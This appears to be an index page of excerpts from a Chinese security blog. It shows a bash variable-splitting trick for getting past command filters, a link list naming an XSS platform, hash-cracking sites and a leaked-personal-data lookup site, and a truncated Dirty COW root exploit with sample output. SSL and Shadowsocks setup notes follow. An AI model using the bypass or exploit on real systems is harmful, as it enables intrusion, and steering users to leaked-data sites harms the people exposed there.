Linux 下: 如果存在命令执行限制,或者执行命令无显示,不妨这样试试 在bash命令中,用赋值方式绕过。例如: ~$ a=w;b=h;c=o;d=a;e=m;f=i;$a$b$c$d$e$f
Author: 系统自定义
常用链接集合(持续更新)
Burp最全的中文使用说明:https://t0data.gitbooks.io/burpsuite/content/ 谷歌crx插件下载:http://chrome-extension-downloader.com 大叔的XSS平台:http://xss.jozxing.cc/index.php?do=login /*支持手机短信接收 Linux系统依赖包:https://pkgs.org / *缺什么依赖包,这里,能找到。 Windows系统下需要的东西都在这里:http://msdn.itellyou.cn 这个无需解释:http://www.cmd5.com OR http://www.chamd5.org 社工库:http://www.sgk98.com L […]
申请免费SSL三年期限,Nginx配置和安装教程(xss平台为例)
1.打开网站 www.startssl.com ,进行注册。 2.右上角Sing-up点击后,输入邮箱,会收到登录的随机码。(这个貌似每次登录都是这样,邮箱收验证码,看到过其他登录方式,就是导入私有证书到浏览器。) 3.登陆后,进入页面,会有三个大的标签页,点击Validations Wizard 4.然后有单项选择,选择 Domain Validation (for SSL certificate) ,并Continue。 5.输入你的域名,然后会自动搜索域名相关人信息,找到域名联系人的邮箱,然后发送验证码确认域名信息,输入验证码后确定验证。 6.验证成功后提示 Validation Success You have successfully authenticated domain”domain.com“. You will be able to use thi […]
[提权] 脏牛漏洞 Dirty COW CVE-2016-5195 2.6.22 < 3.9 (x86/x64)
/* * (un)comment correct payload first (x86 or x64)! * * $ gcc cowroot.c -o cowroot -pthread * $ ./cowroot * DirtyCow root privilege escalation * Backing up /usr/bin/passwd.. to /tmp/bak * Size of binary: 57048 * Racing, this may take a while.. * /usr/bin/passwd is overwritten * Popping root shell. * Don’t forget to restore /tmp/bak * thread stopped * thread stopped * root@box:/root/cow# id * uid= […]
Python 生成随机数For work
python脚本.py: from random import Random i=0 def random_str(randomlength=30): str = ” chars = ‘AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789_’ length = len(chars) – 1 random = Random() for i in range(randomlength): str+=chars[random.randint(0, length)] return str while (i<500): i=i+1 print ‘o’+random_str() linux下执行: python python脚本.py > python随机数.txt
Ubuntu 下安装ss
1.安装Shadowsocks pip install shadowsocks 2.配置shadowsocks的配置文件,在/etc/目录下新建ss.config,输入以下内容 { “server”:”host ip”, “local_port”:1080, “server_port”: 7860, “password”: “hongkong”, “timeout”:300, “method”:”rc4-md5″ } 3.启动shadownsocks ssserver -c /etc/ss.config -d start 4.新建自动切换模式 .点击添加规则列表 .规则列表模式选择 shadowsocks的代理 .默认情景模式选择 直接连接 .规则列表选项设置选择 AutoProxy .在规则列表网址里输入 https://raw.githubusercontent.com/ […]